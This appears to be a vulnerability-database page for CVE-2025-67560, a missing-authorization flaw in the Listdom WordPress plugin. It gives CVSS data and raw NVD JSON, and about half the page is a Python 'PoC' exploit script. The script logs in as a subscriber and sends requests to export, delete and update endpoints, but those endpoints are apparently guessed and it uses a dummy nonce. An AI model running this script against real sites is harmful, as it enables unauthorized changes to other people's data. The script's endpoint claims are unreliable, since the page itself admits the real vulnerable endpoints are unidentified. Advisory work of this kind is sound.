Security Vulnerability Report
中文
CVE-2025-67560 CVSS 5.4 MEDIUM

CVE-2025-67560

Published: 2025-12-09 16:18:32
Last Modified: 2026-04-27 18:16:43

Description

Missing Authorization vulnerability in Webilia Inc. Listdom listdom allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Listdom: from n/a through <= 5.0.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Listdom <= 5.0.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67560 PoC - WordPress Listdom Broken Access Control # This PoC demonstrates exploitation of missing authorization in Listdom plugin # Requires a low-privilege WordPress account (subscriber role) import requests import sys from urllib.parse import urljoin def exploit_listdom_access_control(target_url, username, password): """ Exploit CVE-2025-67560: Missing Authorization in Listdom Plugin This script demonstrates how a low-privilege user can perform unauthorized actions due to missing capability checks. """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Logging in as low-privilege user: {username}") response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Exploit the broken access control # Common vulnerable endpoints in Listdom plugin vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=listdom_export_data', '/wp-admin/admin-ajax.php?action=listdom_delete_list', '/wp-json/listdom/v1/list/update', '/wp-json/listdom/v1/settings/update' ] print("[*] Attempting to exploit broken access control...") for endpoint in vulnerable_endpoints: full_url = urljoin(target_url, endpoint) # Try to access/modify data without proper authorization exploit_data = { 'list_id': '1', # Target list ID 'nonce': 'exploit' # May not be properly validated } response = session.post(full_url, data=exploit_data, timeout=10) if response.status_code == 200: print(f"[+] Possible vulnerability at: {endpoint}") print(f" Response: {response.text[:200]}") print("[*] Exploitation attempt completed") print("[!] Note: This PoC demonstrates the vulnerability concept") print("[!] Actual exploitation requires identifying specific vulnerable endpoints") return True if __name__ == '__main__': if len(sys.argv) < 5: print("Usage: python cve_2025_67560_poc.py <target_url> <username> <password>") print("Example: python cve_2025_67560_poc.py http://example.com/ user pass") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_listdom_access_control(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67560", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:32.427", "lastModified": "2026-04-27T18:16:43.197", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Webilia Inc. Listdom listdom allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Listdom: from n/a through <= 5.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/listdom/vulnerability/wordpress-listdom-plugin-5-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}